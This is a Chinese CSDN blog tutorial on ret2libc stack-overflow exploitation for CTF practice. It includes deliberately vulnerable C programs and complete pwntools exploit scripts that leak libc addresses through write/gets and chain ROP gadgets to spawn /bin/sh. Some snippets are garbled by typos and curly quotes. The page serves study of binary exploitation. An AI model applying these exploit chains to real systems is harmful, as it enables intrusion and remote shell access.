ROP-Ret2Libc概述和利用

最新推荐文章于 2024-04-07 19:07:29 发布
最新推荐文章于 2024-04-07 19:07:29 发布
阅读量1.4k 收藏 18
点赞数 3
分类专栏: pwn学习 文章标签: shell linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanghuapyk/article/details/115013089
版权

ret2libc简介

ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址
ret2libc通常可以分为下面这几类:

  • 程序中自身就含有system函数和"/bin/sh"字符串
  • 程序中自身就有system函数,但是没有"/bin/sh"字符串
  • 程序中自身就没有system函数和"/bin/sh"字符串,但给出了libc.so文件
  • 程序中自身就没有system函数和"/bin/sh"字符串,并且没有给出libc.so文件

基本思路

  • 无论在什么情况下,我们都要想办法找到system()函数的地址和"/bin/sh"字符串的地址,只有这样才能执行系统函数,拿到shell;
  • 当程序中没有"/bin/sh"字符串时,我们可以利用程序中某些函数如:read,fgets,gets等函数将"/bin/sh"字符串写入bss段或某个变量中,并且要可以找到其地址;
  • 对于给出了libc.so文件的程序,我们可以直接在libc.so文件当中去找system()函数和"/bin/sh"字符串,因为libc.so文件中也是包含这些了的;
  • 最后对于没有给出libc.so文件的程序,我们可以通过泄露出程序当中的某个函数的地址,通过查询来找出其使用lib.so版本是哪一个
    我们以ctf-wiki中例子来看看具体方法

简述PLT表和got表

在程序第一次运行程序时,程序会到plt表中查找函数地址,找不到相应的函数地址,就会到got表中去找相应的函数,找到了过后,就会将got表中的函数地址保存在plt表中,第二次运行程序是,直接调用函数是就会跳转到plt表中执行函数

例子:

ROP-RetLibc32 位实例

下面我分别用32位和64位的程序来讲解ret2libc的情况,
我们可以看一下32位程序的源代码

#include<stdio.h>
char buf2[10] = "ret2libc is good";
void vul()
{
	char buf[10];
	gets(buf);
}
void main()
{
	write(1,"hello",5);
	vul();
}
//gcc -no-pie -fno-stack-protector -m32 -o ret2libc1_32 ret2libc1_32.c

发现gets溢出函数
查看程序的保护机制,发现仅有nx保护
在这里插入图片描述
先查看ret2-text查看是否有system函数
所以我们使用objdump查看system plt地址,发现并没有。

objdump -d -j .plt ./ret2libc1_32 |grep system

在这里插入图片描述
使用ROPgadget查找/bin/sh的地址,发现没有/bin/sh,所以我们只能靠自己构造出这个字符串了
ROPgadget --binary ./ret2libc1_32 --string “/bin/sh”
在这里插入图片描述
明确目标
system函数属于libc,而libc.so 动态链接库中的函数之间相对偏移是固定的。
即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。
思路:
1、泄露ret2libc_32任意一个函数的位置
2、获取libc的版本
3、根据偏移获取shell和sh的位置
4、执行程序获取shell
6. ldd 列出动态库依赖关系

发现动态库的依赖
在这里插入图片描述
Gdb看一下程序的偏移,
在这里插入图片描述
偏移为22,然后开始exp
from pwn import *
context(arch=“i386”,os=“linux”)
p=process("./ret2libc1_32")
e=ELF("./ret2libc1_32")

write_plt_address= e.plt[“write”]
gets_got_address = e.got[“gets”]
vul_addr = e.symbols[“vul”]

offset = 22
payload1= offset*“A”+p32(write_plt_address)+p32(vul_addr)“”“write函数执行后返回的地址,也就是第二次执行该函数”“”
+p32(1) “”“write函数的第一个参数,”“”
+p32( gets_got_address) “”“write函数的第二个参数,打印该地址的数据”“”

  • p32(4) “”“write函数的第三个参数,打印的字节”“”
    p.sendlineafter(“hello”,payload1)

gets_addr =u32(p.recv()) “”“”接受打印出的gets函数在plt表的真实地址“”

libc = ELF("/lib/i386-linux-gnu/libc.so.6")
libc_base=gets_addr-libc.symbols[“gets”]
system_addr =libc_base+libc.symbols[“system”]
bin_sh_addr=libc_base+libc.search("/bin/sh").next()

payload2 = offset*“A”+ p32(system_addr)+p32(0x00000000)+p32(bin_sh_addr)
p.sendline(payload2)
p.interactive()

ROP-RetLibc64 位实例

#include<stdio.h>
char buf2[10] = "ret2libc is good";
void vul()
{
	char buf[10];
	gets(buf);
}
void main()
{
	write(1,"hello",5);
	vul();
}
//gcc -no-pie -fno-stack-protector -m32 -o ret2libc1_32 ret2libc1_32.c

64位程序是使用rdi,rsi,rdx,rcx,r8,r9来传递参数
保护机制仅开了NX
在这里插入图片描述

Write(1,buf2,20)需要的参数用rdi,rsi,rdx传参,这里没有相应的片段,所以就不设置第三个参数了
ROPgadget --binary ./ret2libc1_64 --only "pop|ret"查看程序中的相关片段
在这里插入图片描述
偏移为18
在这里插入图片描述
Exp为

#coding:utf-8
from pwn import *
context(arch="amd64",os="linux")
p=process("./ret2libc1_64")
e=ELF("./ret2libc1_64")
   

write_plt_addr= e.plt["write"]
gets_got_addr= e.got["gets"]
vul_addr = e.symbols["vul"]
 
#0x00000000004005e3 : pop rdi ; ret
pop_rdi_addr=0x4005e3
#0x00000000004005e1 : pop rsi ; pop r15 ; ret   这里的r15必须给他指定参数,可以随便设置
pop_rsi_addr=0x4005e1

offset = 18 
payload1 = offset*"A"+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_addr)+p64(gets_got_addr)+ p64(1)+p64(write_plt_addr)+p64(vul_addr)
pause()
p.sendlineafter("hello",payload1)
  
gets_addr =u64(p.recv()[:8])
print gets_addr
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc_base=gets_addr-libc.symbols["gets"]
system_addr =libc_base+libc.symbols["system"]
bin_sh_addr=libc_base+libc.search("/bin/sh").next()
  
payload2 = offset*"A"+p64(pop_rdi_addr)+p64(bin_sh_addr)+ p64(system_addr)

p.sendline(payload2)
p.interactive()

程序有system函数,没有/bin/sh参数

先检查程序的保护程序
在这里插入图片描述

查看程序中知否有系统函数system

objdump -d -M intel -j .plt ./ret2libc2 | grep 'system'

发现存在system函数
在这里插入图片描述
发现这里的函数,然后去查找程序中是否有参数/bin/sh
在这里插入图片描述
发现没有参数,所以我们这里需要手动构造一个参数
使用disass main反汇编查看程序汇编代码
在这里插入图片描述

发现溢出函数
计算偏移为112
在这里插入图片描述

下面开始编写exp
获取可执行程序对象和ELF文件对象

p=process(./ret2libc2)
e=ELF(./ret2lic2)

先找出ELF文件中的system函数地址和gets函数地址

system_addr= e.plt["system"]
gos_addr=e.plt["gots"]

构造payload
因为程序中只有一个gets函数,不能构造我们的二次溢出,所以我们将将gets函数写入payload构造二次溢出,将参数bin_sh_addr传入其中,将参数传入过后,我们必须将它pop掉,因为这个参数不能被执行。所以我们要在程序中找出pop,ret字段,

ROPgadget --binary ./ret2libc2 --only "pop|ret"

在这里插入图片描述

将此处地址传入栈,然后再将需要pop的数据bin_sh_addr传入
bin_sh_addr我们必须找一个我们可以写入的数据段,并且不能更改系统中的数据
使用vmmap命令查看可写入段
在这里插入图片描述

然后将这一个段的地址-16就是写入参数的地址
构造payload如下

bin_sh_addr=0x804b000-0x10
pop_addr=0x0804843d

offset=112
payload=offset*"a"+p32(gets_addr)+p32(pop_addr)+p32(bin_sh_addr) +p32(system_addr)+p32(0)+p32(bin_sh_addr)

完整的exp如下:

from pwn import *

context(arch="i386",os="linux")
p = process("./ret2libc2")
e = ELF("./ret2libc2")

system_addr= e.plt["system"]
gets_addr=e.plt["gets"]
bin_sh_addr=0x804b000-0x10
pop_addr=0x0804843d

offset=112
payload= offset*"a"+p32(gets_addr)+p32(pop_addr)+p32(bin_sh_addr) +p32(system_addr)+p32(0)+p32(bin_sh_addr)
p.sendline(payload)

p.interactive()
一点.
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux 64位 内存泄漏,64位linux系统:栈溢出+ret2libc ROP attack
weixin_34185033的博客
05-01 650
一.实验要求栈溢出+ ret2libc ROP 操作系统:Ubuntu 16.04 64bit 安全机制:不可执行位保护,ASLR(内存地址随机化)打开安全机制,确保×××能绕过以上安全机制,利用漏洞完成attack,实现基本目标:调用system(“/bin/sh”),打开shell。二.实验概述ret2libc(return-into-libc)是一种利用缓冲区溢出的代码复用技术,...
rop轻松谈.pdf
10-21
ret2libc和ret2text是ROP技術中使用的兩種攻擊方法。ret2libc攻擊方法是通過覆蓋函數返回地址,控制程式的執行流程,執行惡意代碼。ret2text攻擊方法是通過覆蓋函數返回地址,控制程式的執行流程,執行惡意代碼,並...
ret2libc类型题目思考-ret2libc1
qq_30528603的博客
05-29 182
一眼看到栈溢出,ret2libc这类型的题目就是要利用栈溢出将控制流转移到glibc库的函数中。这里我们一定是找的plt表而不是system字符串的地址,这是要分清楚的。关于plt表和got表参考我的其他博客,这个玩意我也理解了很久比较愚钝。但是我在IDA看到距离ebp是0x64h,就算换算成10进制在加4也是104,当时我就觉得很疑惑。打算复现CTFwiki中的三个ret2libc类型的实现。当函数要返回的时候,他将跳到system函数的地址去执行,此时他将把ebp+4的内容当做函数的第一个参数传递。
pwn基本ROP——ret2libc
turtlesd的博客
04-26 2237
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
ret2libc
最新发布
2301_79863983的博客
04-07 652
以wiki中的libc的第三道例题为例,理解libc
linux中ret2libc入门与实践
counsellor的专栏
08-23 6775
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
libc泄露以及偏移
RKAnjia的博客
03-23 649
payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+ p32(write_plt) + p32(start)(返回地址) + p32(1)+ p32(write_got)+p32(4) 后面三个是write函数的参数 write(1,‘write_got’,4) 4代表输出4个字节,write_got则为要泄露的地址 write函数原型是write(fd, addr, len),即将addr作为起始地址,读取len字节的数据到文件流fd(0表示标准输入流stdin、1表示标准输出流s
周玉川-2017221302006-第三次作业2
08-08
攻击者可采用 ret2libc利用 Write-Protection Mitigation (WPM) 和 Return-Oriented Programming (ROP) 技术绕过 DEP,例如将 shellcode 写入不受 DEP 保护的内存区域,或利用 API 关闭 DEP。 3. **GS (Guarded ...
带exp的pwn测试文件
09-12
这些文件涵盖了多种经典的漏洞利用技术,如ret2text、ret2syscall、ret2shellcode、ret2libc、ret2csu、stack_pivoting、stack_smash以及SROP(Secure Return Oriented Programming)和frame_faking。下面将详细介绍...
pt-detector:使用英特尔处理器跟踪进行代码重用漏洞利用检测
05-18
计算机工程-论文项目标题:“使用英特尔处理器跟踪技术的代码重用漏洞利用检测” Description...)开发一种在运行时检测不同类型的代码重用漏洞(即ret2libcROP,JOP等)的机制。 CFI)。 学分:该项目利用以下项目:
eLearnSecurity 漏洞利用开发学生笔记(作者:Joas).pdf
10-06
"Return-to-libc / ret2libc"和"ASLR Bypass"是两种常见的绕过防护的策略。前者利用动态链接库(libc)中的已知函数地址来执行代码,后者则涉及绕过地址空间布局随机化(ASLR)技术,ASLR通常用于增加攻击的难度,...
ROP Emporium ret2csu
u014377094的博客
02-18 426
现在的ROP Emporium一共有8题,后几道题相比过去的题有了一些变化,国内的新wp也是非常难找,本篇基于ROP Emporium - Ret2csu (x64) - blog.r0kithax.comhttps://blog.r0kithax.com/ctf/infosec/2020/10/20/rop-emporium-ret2csu-x64.html 这位大佬的wp进行部分的解释。 打开ida,依旧是惯例的明显栈溢出的pwnme,ret2win中我们可以看到flag是加密后文件,key文件是.
ROP之ret2libc
酉酉的博客
06-03 1790
ROP之ret2libc 修改返回地址,让其指向内存中已有的某个函数 当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数,如system() payload结构 通过溢出覆盖返回地址(相当于call system) padding + system address 调用system时的返回地址,可...
使用ret2libc攻击方法绕过数据执行保护
热门推荐
海枫的专栏
02-08 1万+
本文介绍ret2libc攻击方法,可以绕过栈执行保护安全机制
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1149
CISCN2021pwn pwny(数组越界,劫持exit_hook)
内存安全试验:ret2libc绕过DEP
weixin_42072280的博客
05-08 709
参考资料 1.https://www.cnblogs.com/0831j/p/9219243.html (实验、原理) 2.https://www.cnblogs.com/xidian-wws/p/10819073.html(getenvaddr那个的说明) 实验过程中的一些问题 ...
shellcode之二.Plus2:ret2libc实例
AZURE
01-22 4251
在最后提到ret2libc,原书并没有详细的资源。但理解这个对以后如何绕开不可执行栈(nx-stack)有很大的帮助,鉴于此,我在网络上找到一些相关资料,并进行相应的试验。 The basic idea behind the "Return to Libc" attack is that even though the stack has been marked "Non Executable"
内存安全试验:ret2libc绕过DEP另一个例子
weixin_42072280的博客
05-09 716
关于ret2libc的实验原理见我的另一篇博客:https://mp.csdn.net/postedit/89948519 这是ret2libc的又一个例子 这个例子和之前的那个例子区别主要是:之前的那个例子漏洞程序和攻击程序是分开的,而这个实验是在一个程序里面实现的。 虽然看似比之前的那个简单,但是还是遇到了很多问题,现一一记录下来,供自己查阅,也供他人学习。 ...
rop之ret2libc
温和的跳跃
02-04 253
发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个 我回顾一下ret2libc (本身就不熟悉 : ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库 里面包含很多函数,当程序运行到需要链接的地方就会加载进来。 为什么要使用这种办法呢,当程序开启DEP(data execute preve..
canary3 利用格式化漏洞泄露canary 利用ROP执行shell
06-09
这个过程需要先找到程序中已有的可用代码段,然后将这些代码段的地址和参数压入栈中,最终利用ret指令来跳转到这些代码段的地址,以此来执行一段自己构造的代码。具体实现上,可以使用一些ROP工具来辅助构造ROP链,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值